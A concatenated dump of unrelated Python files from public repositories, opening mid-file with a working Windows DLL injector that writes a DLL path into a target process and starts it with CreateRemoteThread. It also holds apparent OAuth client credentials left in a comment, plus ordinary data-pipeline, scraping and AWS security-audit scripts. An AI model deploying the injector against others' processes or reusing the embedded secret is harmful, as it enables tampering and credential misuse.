from ctypes import wintypes
try:
import psutil
except ModuleNotFoundError:
print("Required package psutil was not found, attempting automatic install")
subprocess.check_call([sys.executable, "-m", "pip", "install", "psutil"])
try:
import psutil
except ModuleNotFoundError:
print("Required package 'psutil' could not be automatically installed. Install psutil and try again.")
sys.exit(1)
# Change this string to the name of the process you wish to target ===============================================
target_process = ""
if target_process == "":
print("You need to enter a process name in the target_process field within the python file")
sys.exit(5)
# Logfile logs details about each session
logfile = open("pyject.log", "a+")
def main():
if os.name != "nt":
print("Script targets Windows operating systems only. (Exiting)")
sys.exit(0)
dlls = None
logfile.writelines("\nNew session:\n")
try:
dlls = glob.glob("*.dll")
if not dlls:
raise Exception('\t(ERROR) No DLL(s) found to inject (Exiting)\n')
for dll in dlls:
logfile.write("\t(INFO) Preparing to load " + str(dll) + "\n")
except Exception as ex:
print(ex)
logfile.write(str(ex))
safe_exit(2)
logfile.write("\t(INFO) Waiting for " + target_process + "\n")
process_id = -1
while process_id == -1:
_ = os.system("cls")
print("Waiting for ", target_process, " to start...")
process_id = if_proc_running_get_id(target_process)
time.sleep(1)
# Sleep to allow target program time to load
time.sleep(3)
logfile.write("\t(INFO) " + target_process + " found with process id: " + str(process_id) + "\n")
print(target_process, "found with pid", process_id)
if process_id != 0:
for dll in dlls:
logfile.write("\t(INFO) Attempted to inject " + dll + " into " + str(process_id) + "\n")
# Critical zone
try:
if inject_into_process(os.path.abspath(dll), process_id):
print("Injection appears to have succeeded for ", dll)
logfile.write(
"\t(SUCCESS) Injection of " + dll + " into " + str(process_id) + " seems to have succeeded\n")
else:
print("Injection appears to have failed for ", dll)
logfile.write(
"\t(ERROR) Injection of " + dll + " into " + str(process_id) + " seems to have failed\n")
except Exception as ex:
print(ex)
logfile.write("\t(ERROR) Failed to inject " + dll + " into " + str(process_id) + " (Exiting)\n")
safe_exit(3)
time.sleep(2)
else:
logfile.write("\t(ERROR) Error getting " + target_process + " process id (Exiting)\n")
safe_exit(4)
safe_exit(0)
# Generalised this function for easier reuse
def if_proc_running_get_id(proc_str):
proc_str += ".exe"
for process in psutil.process_iter():
if proc_str.lower() in process.name().lower():
return process.pid
return -1
def inject_into_process(dll_path, pid):
k32 = ctypes.WinDLL('kernel32', use_last_error=True)
# Following section sets the arguments and return types for various kernel32 functions
k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
k32.OpenProcess.restype = wintypes.HANDLE
k32.GetModuleHandleA.argtypes = [wintypes.LPCSTR]
k32.GetModuleHandleA.restype = wintypes.HMODULE
k32.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
k32.GetProcAddress.restype = wintypes.LPVOID
k32.VirtualAllocEx.argtypes = [wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, wintypes.DWORD, wintypes.DWORD]
k32.VirtualAllocEx.restype = wintypes.LPVOID
k32.WriteProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.LPCVOID, ctypes.c_size_t,
ctypes.c_size_t]
k32.CreateRemoteThread.argtypes = [wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, wintypes.LPVOID,
wintypes.LPVOID, wintypes.DWORD, wintypes.LPDWORD]
# Open process
process_handle = k32.OpenProcess(2035711, False, pid)
if not process_handle:
print("Getting process handle failed")
logfile.write("\t(ERROR) Getting process handle (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Obtain handle to kernel32 module in memory
encoded_dll_path = dll_path.encode("ascii")
req_write_size = len(encoded_dll_path)
kernel_module_handle = k32.GetModuleHandleA("kernel32.dll".encode("ascii"))
if not kernel_module_handle:
print("Getting kernel module handle failed")
logfile.write("\t(ERROR) Getting kernel module (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Find load library
load_lib = k32.GetProcAddress(kernel_module_handle, "LoadLibraryA".encode("ascii"))
if not load_lib:
print("Getting LoadLibraryA address failed")
logfile.write("\t(ERROR) Getting LoadLibraryA address (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Virtual allocation
virt_alloc = k32.VirtualAllocEx(process_handle, None, req_write_size, 0x00001000, 0x40)
if not virt_alloc:
print("Virtual allocation failed")
logfile.write("\t(ERROR) Virtual allocation failed (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Write to process memory
write_proc = k32.WriteProcessMemory(process_handle, virt_alloc, encoded_dll_path, req_write_size, 0)
if not write_proc:
print("Writing to process memory failed")
logfile.write("\t(ERROR) Writing to process memory failed (Error code: {0})\n".format(ctypes.get_last_error()))
return False
# Create remote thread in process
return k32.CreateRemoteThread(process_handle, None, 0, k32.LoadLibraryA, virt_alloc,
0, None)
def safe_exit(code):
logfile.close()
sys.exit(code)
if __name__ == "__main__":
main()
``` |
{
"source": "JonathanBerkeley/python_scripts",
"score": 3
} |
#### File: JonathanBerkeley/python_scripts/clicker.py
```python
import sys
import mouse
import time
def main():
if len(sys.argv) > 1:
interval = int(sys.argv[1])
else:
interval = 7
while True:
try:
clicker_code(interval)
except KeyboardInterrupt:
print("-- Exitting --")
sys.exit(0)
def clicker_code(interval):
mouse.click()
time.sleep(interval)
if __name__ == "__main__":
main()
``` |
{
"source": "jonathanbethel/OasisLMF",
"score": 3
} |
#### File: oasislmf/exposures/csv_trans.py
```python
__all__ = [
'Translator'
]
import json
import logging
import multiprocessing
import os
import pandas as pd
from lxml import etree
from oasislmf.utils.concurrency import (
multiprocess,
multithread,
Task,
)
class Translator(object):
def __init__(self, input_path, output_path, xslt_path, xsd_path=None, append_row_nums=False, chunk_size=5000, logger=None):
"""
Transforms exposures/locations in CSV format
by converting a source file to XML and applying an XSLT transform
to apply rules for selecting, merging or updating columns
An optional step is to passing an XSD file for output validation
:param input_path: Source exposures file path, which should be in CSV comma delimited format
:type input_path: str
:param output_path: File to write transform results
:type output_path: str
:param xslt_path: Source exposures Transformation rules file
:type xslt_path: str
:param xsd_path: Source exposures output validation file
:type xsd_path: str
:param append_row_nums: Append line numbers to first column of output called `ROW_ID` [1 .. n] when n is the number of rows processed.
:type append_row_nums: boolean
:param chunk_size: Number of rows to process per multiprocess Task
:type chunk_size: int
"""
self.logger = logger or logging.getLogger()
self.xsd = (etree.parse(xsd_path) if xsd_path else None)
self.xslt = etree.parse(xslt_path)
self.fpath_input = input_path
self.fpath_output = output_path
self.row_nums = append_row_nums
self.row_limit = chunk_size
self.row_header_in = None
self.row_header_out = None
def __call__(self):
csv_reader = pd.read_csv(self.fpath_input, iterator=True, dtype=object, encoding='utf-8')
task_list = []
for chunk_id, (data, first_row, last_row) in enumerate(self.next_file_slice(csv_reader)):
task_list.append(Task(self.process_chunk, args=(data,first_row,last_row, chunk_id), key=chunk_id))
results = {}
num_ps = multiprocessing.cpu_count()
for key, data in multithread(task_list, pool_size=num_ps):
results[key] = data
## write output to disk
for i in range(0, len(results)):
if (i == 0):
self.write_file_header(results[i].columns.tolist())
results[i].to_csv(
self.fpath_output,
mode='a',
encoding='utf-8',
header=False,
index=False,
)
def process_chunk(self, data, first_row_number, last_row_number, seq_id):
xml_input_slice = self.csv_to_xml(
self.row_header_in,
data
)
self.print_xml(xml_input_slice)
# Transform
xml_output = self.xml_transform(xml_input_slice, self.xslt)
# Validate Output
if self.xsd:
self.logger.debug(self.xml_validate(xml_output, self.xsd))
# Convert transform XML back to CSV
return self.xml_to_csv(
xml_output, # XML etree
first_row_number, # First Row in this slice
last_row_number # Last Row in this slice
)
def csv_to_xml(self, csv_header, csv_data):
root = etree.Element('root')
for row in csv_data:
rec = etree.SubElement(root, 'rec')
for i in range(0, len(row)):
if(row[i] not in [None, "", 'NaN']):
rec.set(csv_header[i], row[i])
return root
def xml_to_csv(self, xml_elementTree, row_first, row_last):
root = xml_elementTree.getroot()
# Set output col headers
if not (self.row_header_out):
self.row_header_out = root[0].keys()
# create Dataframe from xml and append each row
rows = []
for rec in root:
rows.append(dict(rec.attrib))
df_out = pd.DataFrame(rows, columns=self.row_header_out)
# Add column for row_nums if set
if self.row_nums:
start = row_first + 1
end = start + len(df_out)
df_out.insert(0, 'ROW_ID', pd.Series(range(start,end)))
return df_out
def xml_validate(self, xml_etree, xsd_etree):
xmlSchema = etree.XMLSchema(xsd_etree)
self.print_xml(xml_etree)
self.print_xml(xsd_etree)
if (xmlSchema.validate(xml_etree)):
return True
else:
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.error('Input failed to Validate')
log = xmlSchema.error_log
self.logger.error(log.last_error)
return False
def xml_transform(self, xml_doc, xslt):
lxml_transform = etree.XSLT(xslt)
return lxml_transform(xml_doc)
def next_file_slice(self, file_reader):
while True:
try:
df_slice = file_reader.get_chunk(self.row_limit)
if(not self.row_header_in):
self.row_header_in = df_slice.columns.values.tolist()
yield (
df_slice.fillna("").values.astype("unicode").tolist(),
df_slice.first_valid_index(),
df_slice.last_valid_index()
)
except StopIteration:
self.logger.debug('End of input file')
break
def write_file_header(self, row_names):
pd.DataFrame(columns=row_names).to_csv(
self.fpath_output,
encoding='utf-8',
header=True,
index=False,
)
def print_xml(self, etree_obj):
self.logger.debug('___________________________________________')
self.logger.debug(etree.tostring(etree_obj, pretty_print=True))
```
#### File: oasislmf/exposures/pipeline.py
```python
__all__ = [
'OasisFilesPipeline'
]
class OasisFilesPipeline(object):
def __init__(
self,
model_key=None,
source_exposures_file_path=None,
canonical_exposures_file_path=None,
model_exposures_file_path=None,
keys_file_path=None,
keys_errors_file_path=None
):
self._model_key = model_key
self._source_exposures_file_path = source_exposures_file_path
self._canonical_exposures_file_path = canonical_exposures_file_path
self._model_exposures_file_path = model_exposures_file_path
self._keys_file_path = keys_file_path
self._keys_errors_file_path = keys_errors_file_path
self._items_file_path = None
self._coverages_file_path = None
self._gulsummaryxref_file_path = None
self._oasis_files = {
'items': self._items_file_path,
'coverages': self._coverages_file_path,
'gulsummaryxref': self._gulsummaryxref_file_path
}
self._file_paths = (
'source_exposures_file_path',
'canonical_exposures_file_path',
'model_exposures_file_path',
'keys_file_path',
'keys_errors_file_path',
'items_file_path',
'coverages_file_path',
'gulsummaryxref_file_path',
)
def __str__(self):
return '{}: {}'.format(self.__repr__(), self.model_key)
def __repr__(self):
return '{}: {}'.format(self.__class__, self.__dict__)
def _repr_pretty_(self, p, cycle):
p.text(str(self) if not cycle else '...')
@property
def model_key(self):
"""
Model key property - getter only.
:getter: Gets the key of model to which the pipeline is attached.
"""
return self._model_key
@property
def source_exposures_file_path(self):
"""
Source exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._source_exposures_file_path
@source_exposures_file_path.setter
def source_exposures_file_path(self, p):
self._source_exposures_file_path = p
@property
def canonical_exposures_file_path(self):
"""
Canonical exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._canonical_exposures_file_path
@canonical_exposures_file_path.setter
def canonical_exposures_file_path(self, p):
self._canonical_exposures_file_path = p
@property
def model_exposures_file_path(self):
"""
Model exposures file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._model_exposures_file_path
@model_exposures_file_path.setter
def model_exposures_file_path(self, p):
self._model_exposures_file_path = p
@property
def keys_file_path(self):
"""
Oasis keys file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._keys_file_path
@keys_file_path.setter
def keys_file_path(self, p):
self._keys_file_path = p
@property
def keys_errors_file_path(self):
"""
Oasis keys error file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._keys_errors_file_path
@keys_errors_file_path.setter
def keys_errors_file_path(self, p):
self._keys_errors_file_path = p
@property
def items_file_path(self):
"""
Oasis items file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._items_file_path
@items_file_path.setter
def items_file_path(self, p):
self._items_file_path = self.oasis_files['items'] = p
@property
def coverages_file_path(self):
"""
Oasis coverages file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._coverages_file_path
@coverages_file_path.setter
def coverages_file_path(self, p):
self._coverages_file_path = self.oasis_files['coverages'] = p
@property
def gulsummaryxref_file_path(self):
"""
GUL summary file path property.
:getter: Gets the file path
:setter: Sets the current file path to the specified file path
"""
return self._gulsummaryxref_file_path
@gulsummaryxref_file_path.setter
def gulsummaryxref_file_path(self, p):
self._gulsummaryxref_file_path = self.oasis_files['gulsummaryxref'] = p
@property
def oasis_files(self):
"""
Oasis files set property - getter only.
:getter: Gets the complete set of paths of the generated Oasis
files, including ``items.csv``, ``coverages.csv``, `gulsummaryxref.csv`.
"""
return self._oasis_files
def clear(self):
"""
Clears all file path attributes in the pipeline.
"""
[setattr(self, p, None) for p in self._file_paths]
```
#### File: tests/cmd/test_bin_check.py
```python
from unittest import TestCase
import os
import six
from backports.tempfile import TemporaryDirectory
from mock import patch
from oasislmf.cmd import RootCmd
def get_command(target_dir=None, extras=None):
kwargs_str = ' '.join('--{} {}'.format(k, v) for k, v in six.iteritems(extras or {}))
return RootCmd(argv='bin check {} {}'.format(kwargs_str, target_dir or '').split())
class CheckCmdRun(TestCase):
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_target_is_not_supplied___cwd_is_checked(self, check_conv_tools, check_inputs_mock):
cmd = get_command()
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(os.path.abspath('.'), do_il=False, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=False)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_target_is_supplied___supplied_path_is_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d)
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=False, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=False)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_do_il_is_true___il_input_files_are_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d, extras={'do-il': ''})
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=True, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=True)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_check_binaries_is_true__existance_of_bin_files_are_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d, extras={'check-binaries': ''})
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=False, check_binaries=True)
check_conv_tools.assert_called_once_with(do_il=False)
``` |
{
"source": "jonathanbglass/barcodes",
"score": 3
} |
#### File: jonathanbglass/barcodes/gdrive.py
```python
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'JB-Python'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def findimages(drive_service):
page_token = None
while True:
fmetadata={ 'name': 'IFTTT', 'mimeType': 'application/vnd.google-apps.folder' }
response = drive_service.files().list(q=fmetadata,
fields='nextPageToken, files(id, name)',
pageToken=page_token).execute()
for file in response.get('files', []):
# Process change
print ('Found file: ' + file.get('name') + file.get('id'))
page_token = response.get('nextPageToken', None)
if page_token is None:
break
def main():
"""Shows basic usage of the Google Drive API.
Creates a Google Drive API service object and outputs the names and IDs
for up to 10 files.
"""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('drive', 'v3', http=http)
findimages(service)
results = service.files().list(
pageSize=100,fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print('{0} ({1})'.format(item['name'], item['id']))
if __name__ == '__main__':
main()
```
#### File: jonathanbglass/barcodes/get_label_barcodes.py
```python
import os
from os import listdir
from os.path import isfile, join
import argparse
import requests
import shutil
import time
# 861094493354-cfvvblgc9a0ukdk3ouomj3pdb599qeml.apps.googleusercontent.com
# ue4c3mBtH8srX9p6xV2ujkck
def gen_large(upc):
url = "http://www.waspbarcode.com/barcode-maker"
print (upc)
payload = {'q':'python',
'__VIEWSTATE':'/<KEY>',
'__VIEWSTATEGENERATOR': 'D2163E31',
'__EVENTVALIDATION': '/wEdABBZEZXJCrXVLa4/ZCCdg+ptp6Wh9EdvDOtAY7Kw6QJZBahOTAnKTVDqtmKphJo8TEXQnYXUIRSWjp6YpdzbGcVy1H7Lp7UqDhmRJQXvvUQVESrSvRBeaiRDN+dziPPpbMQe8fGpYxpBDyOINs6Js4HnPaWuJlNQyjbNvwNvvXiHYpBv0ry8hoG5zy58yO8NR4hwYULD/xQDE5+DRqDqsB9UrxCQcRSIL0HndruRNlianUlI7p5F0NYPySEUDybhMD6uLaXkb+BrSP5DHdWZcwmLiRmX6xsjdlvskrKlxB7M8eQuCE6VNfx2Sqr3tnHNfjPh4uoE4MrSwShG8jl8PJ5VAJGoDkNcRQZ826H3634uP8/MzH4Z3yZDTwgFhWz6Png=',
'ph_content_0$ddlType': 'UPC-A',
'ph_content_0$txtCode': upc,
'ph_content_0$txtEmail': '<EMAIL>',
'ph_content_0$ctl00': 'Generate' }
r = requests.post(url, payload)
return
def gen_thumbnail(upc):
thumbnailurl="http://www.waspbarcode.com/services/waspbarcode/barcodegen.ashx?symbology=UpcA&code="+upc
t = requests.get(thumbnailurl, stream=True)
if t.status_code == 200:
with open("attachments/"+upc+".png", 'wb') as out_image:
shutil.copyfileobj(t.raw, out_image)
del t
else:
print (t.status_code, t.headers['content-type'], t.encoding)
return
def check_files(upc):
if os.path.exists('labels/'+upc+'_thumbnail.png'):
print ('labels/'+upc+'_thumbnail.png exists')
else:
print ("gen_thumbnail("+upc+")")
gen_thumbnail(upc)
if os.path.exists('labels/'+upc+'_large.png'):
print ('labels/'+upc+'_large.png exists')
else:
print ("gen_large("+upc+")")
gen_large(upc)
return
def main():
translation_table = dict.fromkeys(map(ord, '*\n'), None)
url = "http://www.waspbarcode.com/barcode-maker"
a = open('c:/output/upcs','r')
for line in a:
upc = line.translate(translation_table)
check_files(upc)
if __name__ == "__main__":
main()
``` |
{
"source": "jonathanbglass/parallel_prowler",
"score": 2
} |
#### File: jonathanbglass/parallel_prowler/collect_policies.py
```python
import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM Policies
Evaluates policies looking for badness (*.*, Effect:Allow + NotAction)
Need to add more tests/use cases
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
# This policy blacklists all 'iam:*', 'organizations:*', and
# 'accounts:*' with the NotAction. Then it grants specific
# access in the next stanza ('iam:ListRoles', etc)
# The fatal flaw is that it grants access to everything else,
# like lambda or ec2 because of the "Allow" in the first stanza.
# This user can create an EC2 instance, attach an admin role to
# it, and login and give themselves access to Admin. Instance
# privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
```
#### File: jonathanbglass/parallel_prowler/parallel_prowler.py
```python
import argparse
import boto3
import csv
import json
import logging
import mmap
import numpy as np
import os
import pandas as pd
import psutil
import queue
from shlex import quote
import subprocess
import sys
import threading
import time
import uuid
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-pp", "--prowlerPath",
help="Path to Prowler Executable. "
"Defaults to ./prowler/prowler")
parser.add_argument("-pc", "--prowlerCheck",
help="Single or List of Prowler Check(s) [check11]")
parser.add_argument("-pg", "--prowlerGroup",
help="Group of Prowler Checks [cislevel2]")
parser.add_argument("-pE", "--prowlerExclude",
help="Execute all tests except a list of specified "
"checks separated by comma (i.e. check21,check31)")
parser.add_argument("-R", "--region",
help="AWS Region")
parser.add_argument("-r", "--regex",
help="REGEX Pattern to Identify AWS Profiles")
parser.add_argument("-o", "--outputDir",
help="Output Directory")
# parser.add_argument("-o", "--organization",
# help="AWS Profile for Organization Account")
parser.add_argument("-t", "--maxthreads", type=int,
help="Max threads: defaults to # of CPUs")
parser.add_argument("-F", "--resultsFile", type=str,
help="Results CSV to process to a report XLSX file")
parser.add_argument("-l", "--log", type=str,
choices=['info', 'INFO', 'debug', 'DEBUG'],
help="Set LogLevel to INFO (Default) or DEBUG")
parser.add_argument("-v", "--verbosity", type=int, choices=[0, 1],
help="increase output verbosity")
def check_args_debug(args):
# Handle logging
global outputDir
global logging
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename=outputDir + '/' + 'assessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
def check_args_prowlerPath(args):
# Handle prowlerPath
global logging
global prowlerPath
if args.prowlerPath and os.path.exists(args.prowlerPath):
prowlerPath = args.prowlerPath
else:
if not os.path.exists("./prowler/prowler"):
print("Prowler not found. Install or clone the repository into "
"this directory or provide the path with -pp, --prowlerPath")
quit()
else:
prowlerPath = "./prowler/prowler"
def check_args_verbosity(args):
# handle verbosity
global logging
global verbose
if args.verbosity == 1:
verbose = True
logging.info("Verbose")
else:
verbose = False
logging.info("No Verbosity")
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global verbose
global workingProfiles
workingProfiles = []
if not args.profile and not args.regex:
logging.info("Using AWS Default Profile")
if verbose:
print("Using AWS Default Profile")
print(args.profile)
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if verbose:
print("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
if verbose:
print("Profile " + args.profile + " not working")
quit()
else:
logging.info("Profile " + args.profile + " working")
if verbose:
print("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
def check_args_regex(args):
global logging
global verbose
if not args.regex:
logging.info("No REGEX Pattern. Working on a single account.")
if verbose:
print("No REGEX Pattern. Working on a single account.")
else:
# To Do: turn these variable into arguments
configFile = "~/.aws/config"
credFile = "~/.aws/credentials"
profileCount = 0
if os.path.exists(os.path.expanduser(configFile)):
configFileContent = open(
os.path.expanduser(configFile), 'r').read()
else:
logging.error("AWS Config file unreadable")
print("AWS Config file unreadable")
quit()
if args.regex in configFileContent:
logging.info("REGEX found")
if verbose:
print("REGEX found")
for x in configFileContent.split("\n"):
if "[profile" in x and args.regex in x:
profileCount += 1
thisProfile = x.strip('[]').split(" ")[1]
logging.debug("Checking profile: " + thisProfile)
if verbose:
print("Checking profile: " + thisProfile)
if (check_profile(thisProfile)):
logging.debug("Profile " + thisProfile + " works.")
if verbose:
print("Profile " + thisProfile + " works.")
workingProfiles.append(thisProfile)
else:
logging.debug("Profile " + thisProfile
+ " does not work.")
if verbose:
print("Profile " + thisProfile + " does not work.")
if (profileCount > 1) or (profileCount == 0):
profresp = (str(profileCount) + " Profiles found. "
+ str(len(workingProfiles)) + " Profiles work.")
else:
profresp = str(profileCount) + " Profile found and works"
if(len(workingProfiles) == 0):
logging.error("No working profiles, REGEX: " + str(args.regex))
print("No working profiles for REGEX: " + str(args.regex))
quit()
print(profresp)
logging.info(profresp)
else:
logging.error("REGEX " + str(args.regex)
+ " not found in " + configFile)
print("REGEX " + str(args.regex) + " not found in " + configFile)
quit()
def check_args_outputDir(args):
global logging
global outputDir
outputDir = os.path.abspath(os.curdir)
if args.outputDir:
if not os.path.exists(args.outputDir):
print("Output Directory Does Not Exist: " + args.outputDir)
quit()
else:
outputDir = os.path.abspath(args.outputDir)
def process_args(args):
check_args_outputDir(args)
check_args_debug(args)
check_args_verbosity(args)
check_args_prowlerPath(args)
check_args_creds(args)
check_args_regex(args)
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def run_prowler(x):
global args
global logging
global outputDir
global prowlerPath
global resultDict
global verbose
logging.debug("Inside run_prowler: " + x)
if verbose:
print("Inside run_prowler: " + x)
cmd = os.path.realpath(prowlerPath)
cmdopts = ' -p {}'.format(quote(x))
if args.region:
cmdopts += ' -r {}'.format(quote(args.Region))
else:
cmdopts += ' -r us-east-1'
if args.prowlerExclude:
cmdopts += ' -E {}'.format(quote(args.prowlerExclude))
cmdopts += ' -n'
cmdopts += ' -b -M csv'
if args.prowlerCheck is not None:
